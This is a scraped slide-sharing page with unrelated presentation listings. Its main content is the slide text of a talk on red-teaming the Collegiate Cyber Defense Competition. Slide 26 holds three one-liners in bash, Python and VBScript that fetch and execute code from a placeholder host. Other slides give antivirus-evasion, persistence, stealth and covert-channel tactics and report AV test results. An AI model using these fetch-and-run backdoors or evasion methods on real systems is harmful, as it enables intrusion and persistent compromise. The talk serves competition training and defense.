What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 

Dernier (20)

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 

Red teaming the CCDC

  • 1. Red Teaming the CCDC hacking the most paranoid student system administrators in the nation Matt “scriptjunkie” Weeks
  • 2. Some funny things Our mistakes and yours
  • 3. No, don’t start “aCcbsXoAIfRsU”
  • 4. Those other people logged-in are not your friends.
  • 5. You planned to get hacked?
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14. A year of curating red team wallpaper
  • 15.
  • 16. Gotta keep up with changing memes
  • 17. The red team has you
  • 18.
  • 20.
  • 22. The malware games Challenges writing malware
  • 23. Requirements  Full-featured RAT  File access  Interactive shell  Screenshots, keylogger  May include stealth features  Basic backdoors  Used for re-establishing full-featured RAT  Simple command and/or shellcode execution  Callback or listening  Keylogger/persistent monitoring  File packing tools  Worms – every method possible
  • 24. Compatibility is hard Windows XP – Win 8.1 Hook-based keylogging fails… *NIX’s Make Windows look great No two Linux distros startup the same OS X(!) NetBSD OpenBSD FreeBSD X64/x86 OpenIndiana (Solaris) Ubuntu Fedora Linux Mint
  • 25. But hard work pays off, kids
  • 26. On-the-fly backdoors  Usually you are caught off-guard with at least one system  Webshell collections are your friend  Scripting skills are a must while[ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done eval(urllib2.urlopen('http://a.bc/def').read()) echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
  • 27. First world red team problems: I accidentally six or seven keylogger copies
  • 29. Process Write malware Does AV detect? Yes Look for shady code Obfuscate functions, strings Done! No
  • 31. AV test lab  Top market share AV’s (Internet Security Suite version) on default settings  7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
  • 33. Test 1: Widely known malware with 1 byte appended  The only way to fail is by using giant hash lists instead of real signatures FAIL WIN FAIL WINFAIL FAILFAILFAIL WIN WIN WIN WIN
  • 34. Test 2: Malware with public code samples FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL FAIL
  • 35. Test 3: One-off malware with no evasions FAIL FAIL FAIL FAIL FAIL FAIL INDECISIVE FAIL WINWIN WININDECISIVE
  • 36. Test 4: “Chris’s Ex-Girlfriend” – Highly evasive malware workhorse FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL FAIL
  • 37. Test 5: “The Kraken” – Sneaky firewall- evading malware FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL WIN
  • 38. Test 6: Worm with no evasions FAIL FAIL FAIL FAIL FAIL FAIL WIN WINFAIL Hosed VMFAILFAIL
  • 39. Test 7: Legit program used maliciously FAIL FAIL FAIL FAILFAIL FAIL FAIL FAIL FAIL FAIL FAILINDECISIVE
  • 40. Notes  Symantec was only AV to detect reverse meterpreter on the wire  Kaspersky’s behavioral emulation detected one worm well  Kaspersky and Comodo both recognized at least one piece of malware as unusual, (not on whitelist) but not necessarily bad  Trend Micro was only AV to block hash dumping  Panda, Avast gave errors installing and were not tested
  • 41. Final standings 100% FAIL meh 100% FAIL TIED 1st100% FAIL 100% FAILFAILFAIL meh TIED 1st 3rd meh
  • 42. Just kidding. After 2 hours obfuscating, these are the real final standings: FAIL FAIL FAIL FAILFAILFAIL FAIL FAIL FAIL FAIL FAIL FAIL
  • 43. How do I bypass AV?  Write your own stuff  Dynamically resolve API calls  Obfuscate strings  Introduce environmental/system dependencies to generically thwart sandboxing  Write your own stuff  Impersonate legitimate software  Watch what hits disk  Digitally sign your stuff if you can  Write your own stuff
  • 44. Security Software Lessons  Some AV’s are a total fail  MalwareBytes Pro is in this list with MS, McAfee, F-Secure  Many have one really cool feature or heuristic  Kaspersky, Symantec, Trend Micro  All can be bypassed easily for most malware  Only detection remaining after 2 hours was one worm vs Kaspersky
  • 45. Hiding from the students
  • 46. Hiding from the students  Host hiding  Hide while running  Hide start  Meterpreter is great for functionality, bad for persistence  Mostly custom malware  Mostly standard persistence methods  Don’t run in your own process  Don’t use any of those toy languages with dependencies  Use C!
  • 47. Don’t hide stuff rootkit finders look for
  • 48. Don’t sweat the one-offs
  • 49. Hiding on the wires  Hiding from Wireshark  Harder than hiding on host  Try to blend in with normal traffic  Throw Wireshark crashers  Remove packets from view  Hiding from netstat/tcpview  Using HTTP(S) instead of TCP callbacks doesn’t leave connection open  If that fails, blend in by using common ports and cloud IP’s  Migrate session to web browser or critical process
  • 50. Hiding on the wires  Use every protocol that gets out  TCP  UDP  HTTPS  DNS  Use hop points in cloud/web hosting  Use file sharing/paste/social media sites  Random callback selection and delays to avoid monitors  Any way students can send or receive info, you can too
  • 51. Dealing with firewalls  Two types  Host  Network  Host firewalls  Usually don’t stop outbound traffic  Can go underneath, watch raw packets  Frequently add exceptions or drop the firewall
  • 52. Network firewalls  Great to own  Tough if you don’t  Use service ports since they must be able to reach the hosts
  • 53. Defenses that hurt  Patch or block RCE’s  Strict inbound and outbound network firewall rules  Traffic monitoring  Different passwords on all the boxes  Pull the plug  Reverting (sometimes)  Realizing that sometimes, the red team can’t hurt you as much as finishing injects helps you